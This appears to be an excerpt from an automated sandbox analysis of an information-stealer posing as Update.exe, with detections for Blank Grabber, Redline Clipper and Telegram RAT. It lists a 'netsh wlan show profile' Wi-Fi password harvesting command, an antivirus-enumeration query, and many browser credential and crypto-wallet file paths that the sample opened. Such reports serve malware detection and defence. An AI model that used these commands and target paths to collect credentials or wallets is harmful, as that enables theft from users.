                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF623F7D010
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F95E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF623F95E7C
                    Source: C:\Users\user\Desktop\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Uses netsh to modify the Windows network and firewall settings
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Blank Grabber
                    Source: Yara matchFile source: 00000000.00000003.1665851600.0000019DCB065000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1978245137.000002D8F6B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1983440735.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1665851600.0000019DCB063000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1979523024.000002D8F6364000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 6852, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 1184, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key, type: DROPPED
                    Yara detected Redline Clipper
                    Source: Yara matchFile source: 23.0.lf6o4T3T.exe.970000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000000.1700631224.0000000000972000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1703505307.0000000003250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe, type: DROPPED
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 1184, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Update.exe, 00000001.00000002.1984842868.000002D8F69F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                    Source: Update.exe, 00000001.00000002.1984746664.000002D8F68A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: Update.exe, 00000001.00000002.1984746664.000002D8F68A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: Update.exe, 00000001.00000002.1984746664.000002D8F68A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal WLAN passwords
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanentJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chromeJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: Yara matchFile source: 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 1184, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Blank Grabber
